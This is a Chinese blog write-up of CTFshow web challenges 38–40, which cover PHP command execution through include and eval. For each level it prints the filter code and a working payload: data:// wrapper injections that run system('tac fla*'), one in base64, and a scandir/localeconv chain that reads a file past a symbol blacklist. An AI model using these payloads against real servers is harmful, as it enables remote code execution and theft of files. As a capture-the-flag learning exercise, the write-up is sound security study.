CTFshow系列——命令执行web38-40

这几天也是趁着有空,多更点CTF的东西;毕竟得多方面发展是不是,不能老是盯着渗透测试和应急响应(虽然说也没少看),那多没意思。

文章目录


Web38

话不多说,直接开始:

其实Web37和Web38关中的 include 已经有点涉及到文件包含了,但大差不差。

bash 复制代码
<?php

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

可以看到,跟Web37相比,多了 php 和 file 的过滤,那么我们应该有点思路:

  • php被过滤了,但是data协议不影响,那是不是能用?
  • 至于 file 可能是针对file_get_contents 函数使用;

  • 解决方案:利用data伪协议 + 编码绕过

    • data:// 伪协议:这个协议允许你直接在URL中嵌入数据
  • 原理说明:

  • 当传入?c=data://text/plain,<?=system('tac fla*');?>时,代码会自动拼接成:

  • include(?c=data://text/plain,<?=system('tac fla*');?>);

bash 复制代码
# payload:
 ?c=data://text/plain,<?=system('tac fla*');?>

--

Web39

看看这关有什么不一样:

bash 复制代码
<?php

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

观察代码,我们可以发现 include($c.".php"); 这一句话,那么又与上一关的有什么区别呢?

include($c.".php"); 这句 PHP 代码的含义是

它会尝试包含并执行一个文件,该文件的文件名由变量 $c 的值和固定的字符串 ".php" 拼接而成。

bash 复制代码
# 上payload
?c=data://text/plain,<?=system('tac fla*');?>
# 编码后
?c=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4=

疑问:那我输入?c=data://text/plain,<?=system('tac fla*');?>,代码拼接成什么样了?

  • 首先,$_GET['c'] 的值为 data://text/plain,<?=system('tac fla*');?>。
  • 然后,代码会执行 include(c.".php");,这句代码会把 _GET['c'] 的值和固定的字符串 ".php" 拼接起来。
  • 所以,最终要包含的文件路径会是:data://text/plain,<?=system('tac fla*');?>.php
  • 然而,data:// 伪协议的特性决定了它不会去查找一个名为 data://... 的本地文件,而是直接将 data: 后面跟着的内容作为数据流来处理。因此,PHP 引擎会忽略 .php 后缀,直接将 <?=system('tac fla*');?> 这段代码当作 PHP 代码来执行。

Web40(重点)

bash 复制代码
<?php

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

其实我们一看代码,发现就是Web29~Web36 的类型(没有了include),但是这关是将所有的特殊符号都过滤掉了;

所以我们的data协议等都不能使用了,因为包含(: \ 等符号)

难道我们就没有其他办法了吗?

我们仔细观察,发现题目并没有屏蔽掉 空格 反引号 反斜杠/ 下划线_

这个时候我们就要认识一个新函数:scandir('.') ,具体的可以看我这篇之前写的文章:scandir('.')的用法

(没错,几个月前我就做过这些题目了,只是过了太久,所以忘了<(-_-)>)


看上面这篇文章应该可以知道print_r(scandir(pos(localeconv()))); 查看当前目录所有文件名:

  1. 这里可以用next()来输出数组中的当前元素的下一个元素的值,也就是可以输出第二个(还有end可以输出最后一个)

  2. 但是flag在第三个怎么办?

  3. 可以用array_reverse函数,这个函数就是将数组转置;

bash 复制代码
# payload:

# 打印当前目录
print_r(scandir(pos(localeconv())));
# 显示flag代码
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

这里细心的应该注意到:为什么前面都是用print_r() ,到最后要用show_source() 函数?

直接看图对比就知道了:

对比:

总结

我知道很短,但没办法,我只是有空的时候写写,体谅一下,毕竟还是大学生。

相关推荐
知识分享小能手17 小时前
微信小程序入门学习教程,从入门到精通,微信小程序常用API(上)——知识点详解 + 案例实战(4)
前端·javascript·学习·微信小程序·小程序·html5·微信开放平台
清灵xmf17 小时前
CSS field-sizing 让表单「活」起来
前端·css·field-sizing
德迅云安全杨德俊18 小时前
SCDN-保护网站安全的有效方案
网络·安全·web安全·ddos
文火冰糖的硅基工坊18 小时前
[光学原理与应用-480]:《国产检测设备对比表》
前端·人工智能·系统架构·制造·半导体·产业链
excel18 小时前
Qiankun 子应用生命周期及使用场景解析
前端
weixin_4462608518 小时前
Django - 让开发变得简单高效的Web框架
前端·数据库·django
ObjectX前端实验室19 小时前
【react18原理探究实践】异步可中断 & 时间分片
前端·react.js
SoaringHeart19 小时前
Flutter进阶:自定义一个 json 转 model 工具
前端·flutter·dart
努力打怪升级19 小时前
Rocky Linux 8 远程管理配置指南(宿主机 VNC + KVM 虚拟机 VNC)
前端·chrome
brzhang19 小时前
AI Agent 干不好活,不是它笨,告诉你一个残忍的现实,是你给他的工具太难用了
前端·后端·架构